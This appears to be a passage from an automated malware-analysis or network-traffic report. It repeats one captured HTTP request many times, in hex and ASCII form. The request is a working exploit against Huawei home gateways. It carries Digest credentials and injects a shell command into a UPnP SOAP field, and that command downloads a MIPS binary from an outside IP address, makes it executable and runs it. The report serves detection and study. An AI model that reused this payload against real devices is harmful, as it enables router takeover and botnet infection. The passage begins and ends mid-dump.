65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 